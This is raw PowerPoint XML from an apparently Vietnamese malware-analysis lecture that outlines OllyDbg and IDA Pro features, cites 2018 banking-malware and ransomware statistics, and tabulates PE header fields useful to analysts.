        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 5" descr="OllyD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128" y="87318"/>
            <a:ext cx="1050776" cy="10320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54" y="1109682"/>
            <a:ext cx="9032092" cy="574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45811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OllyDbg</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Loading Malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Memory map</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Viewing threads and stacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Executing code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Breakpoints</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Loading DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Tracing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Exception handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Patching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Analyzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Assistance features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Plug-ins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12293" name="Picture 5" descr="OllyD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128" y="87318"/>
            <a:ext cx="1050776" cy="103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5364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IDA Pro</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Professional disassembler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>IDA Pro Free and license</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>disassembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>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265" y="3140968"/>
            <a:ext cx="6570810" cy="30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0"/>
            <a:ext cx="2243473" cy="1104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517914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smtClean="0"/>
              <a:t>disassembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Text – mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>GUI </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Others</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: list of functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Names</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Imports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Exports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Structures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: list of data structures executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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38932388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navigating</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Next Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Sequence of Bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129496249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Cross references - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Xrefs</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Xrefs</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Xrefs</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Analyse and stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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428999"/>
            <a:ext cx="8280761"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634092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Graph</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>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268760"/>
            <a:ext cx="2133466" cy="42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348881"/>
            <a:ext cx="8475654" cy="3651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4884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Patching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>IDA Pro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>phép</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đổi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>sau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> disassembly và </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chạy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chương</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Thay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đổi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>địa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chỉ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> ô </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nhớ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Bổ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> sung </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chú</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Thay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đổi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>định</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>toán</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: decimal, binary, hex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> name constant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Định</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nghĩa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> data</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35537292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Plug-in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>IDC script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Python script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>License</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52869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reports</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>anking malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>2018: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>830 135 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>users attacked (steal money from bank accounts on the computers)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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276" y="2533157"/>
            <a:ext cx="6123068" cy="354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310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Security reports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Crypto-ransomware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>2018: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>765 538 unique users attacked by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>encryptors</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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2" y="2791134"/>
            <a:ext cx="6480718" cy="3310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0706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Security reports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Local infection </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201593"/>
            <a:ext cx="5749225" cy="545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493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 Headers and Sections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>The PE header contains useful information for the malware analyst including</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830508803"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="658888" y="2420888"/>
          <a:ext cx="7729536" cy="3134360"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2647812"/>
                <a:gridCol w="5081724"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Field</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Information revealed</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Imports</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Functions from other lib. used by the malware</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Exports</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Functions in the malware called by others</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Time Date</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Stamp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Time complied</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Sections</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Names</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> of sections in the file and their sizes on the disk and memory</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Subsystem</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Indicates whether the program is</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> a command-line or GUI app.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Resource</a:t>
                      </a:r>
